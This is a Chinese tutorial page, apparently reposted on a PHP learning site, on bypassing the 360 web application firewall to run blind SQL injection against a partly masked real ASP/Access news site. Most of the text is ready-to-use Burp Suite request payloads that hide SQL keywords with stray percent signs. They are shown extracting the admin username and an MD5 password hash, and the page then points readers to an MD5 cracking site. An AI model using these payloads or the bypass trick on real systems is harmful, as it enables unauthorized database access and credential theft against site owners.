网站地图    收藏   

主页 > 后端 > 网站安全 >

绕过360waf注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 环境:http://www.s**g.cn/news.asp?id=262IIS+asp+access原理:在之前快递厂商安全小测中提到过。IIS下的asp.dll文件在对asp文件后参数串进行url解码时,会直接过滤掉09-0d(09是tab键,0d是回车)、20(...

环境:
http://www.s**g.cn/news.asp?id=262
IIS+asp+access

 

原理:
在之前快递厂商安全小测中提到过。IIS下的asp.dll文件在对asp文件后参数串进行url解码时,会直接过滤掉09-0d(09是tab键,0d是回车)、20(空格)、%(下两个字符有一个不是十六进制)字符。

 

这里是用burp suite来跑的,构造的绕过语句如下:

 

猜表
GET /news.asp?id=262%20and%20exist%s%20(sele%c%t%20count(*)%20from%20§表名§)

 

有admin表

猜字段
GET /news.asp?id=262%20an%d%20(sele%c%t%20count(§字段名§)%20from%20admin)%3E0 

 

有user和pass字段

猜user字段的长度
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20len(user)%20from%20admin)=1 

 

长度为5

猜pass字段的长度
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20len(pass)%20from%20admin)=1 

长度为32

猜user内容 www.2cto.com
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20asc(mid(user,1,1))%20from%20admin)=§97§ 
admin


猜pass内容
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20asc(mid(pass,1,1))%20from%20admin)=§97§
a7b1467f2a5eecb631e2e5ffeafddeb8

从上面看只是简单的sql注入语句加上一点绕过方法。顺便推荐一个国外的md5破解网站, md5decrypter,成功率还是比较高

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论